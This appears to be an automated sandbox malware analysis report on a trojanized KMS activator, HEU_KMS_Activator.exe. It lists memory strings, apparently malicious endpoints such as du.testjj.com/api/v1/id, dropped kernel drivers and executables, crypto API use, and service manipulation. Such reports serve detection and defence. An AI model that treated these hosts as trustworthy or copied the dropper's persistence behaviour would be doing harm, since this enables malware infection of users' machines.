Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://du.testjj.com
Source: nsjB6CE.tmp.1.drString found in binary or memory: https://du.testjj.com/api/v1/id
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id$
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id.
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id7
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id:
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idR
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idREnN
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idY
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/ide
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idh
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/ido
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idoESN
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idt
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pContent-Type:application/x-w
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.drString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pSoftware
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pinvalid
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tilep
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373518440.00000211DEE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: qmgr.db.22.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000016.00000003.1281171307.000002C2B7190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: kms_x64.exe, 0000002B.00000002.2509975294.0000018A2B459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msdn.itellyou.cn=======4
Source: qmgr.db.22.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 103.224.212.216:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.224.212.211:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00404E68 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404E68
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_0040425D GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040425D
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006B3790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_006B3790
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C73790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C73790
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EAE520 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,17_2_00EAE520

System Summary

barindex
Binary is likely a compiled AutoIt script file
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_879fa425-f
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_ce7ede72-e
Source: HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc667202-1
Source: HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_3645b265-4
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b01180f-4
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_3051f025-7
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d5525f31-e
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerLmemstr_8de44e79-4
Source: kms_x64.exe, 0000002B.00000002.2513065647.00007FF67B7C9000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3c28e9e6-3
Source: kms_x64.exe, 0000002B.00000002.2513065647.00007FF67B7C9000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerLmemstr_ab4c0aec-5
Source: kms_x64.exe.34.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eacee51d-4
Source: kms_x64.exe.34.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerLmemstr_d8be9540-d
Source: HEU_KMS_Activator.exe.4.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2b3105d6-3
Source: HEU_KMS_Activator.exe.4.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_bf65d1ec-c
Source: HEU_KMS_Activator.exe.1.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2a7910f6-b
Source: HEU_KMS_Activator.exe.1.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_3f673dc6-a
Source: nsjB6CE.tmp.1.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_933fde6e-a
Source: nsjB6CE.tmp.1.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_a29c8a82-3
Uses powercfg.exe to modify the power settings
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /h off
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00632A30: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle,2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00641C20 OpenSCManagerW,OpenServiceW,ControlService,Sleep,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00641C20
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00403783 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,1_2_00403783
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_LOOK.sysJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_LOOK.sysJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_LOOK.sysJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_Protect.sysJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\DvLayout.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\splashlogo.gifJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\KMSmini.7zJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\digital.7zJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\cert.7zJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\DigitalLicence.7zJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\7Z.EXEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\HeuKmsRenewalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\HeuKmsLogJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\ScriptTemp.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\Office2010OSPP
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\OtherOfficeOSPP
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\ewm_wx.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\ewm_zfb.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\head.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\left.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\office.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\shuoming.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\Windows.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\backup.bmp
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\restore.bmp
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\amt.ico
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\ver.ico
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\pic\zanzhu.ico
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\HEU_KMS_Renewal.xml
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\Office2010OSPP\SLERROR.XML
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\OtherOfficeOSPP\slerror.xml
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\SvcTrigger.xml
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\Office2010OSPP\OSPP.VBS
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\OtherOfficeOSPP\OSPP.VBS
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\HEU_Configuration.ini
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\GetProductKey.data
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\SetupComplete.data
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-client.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-server.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms_x64.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\msvcr100.dll
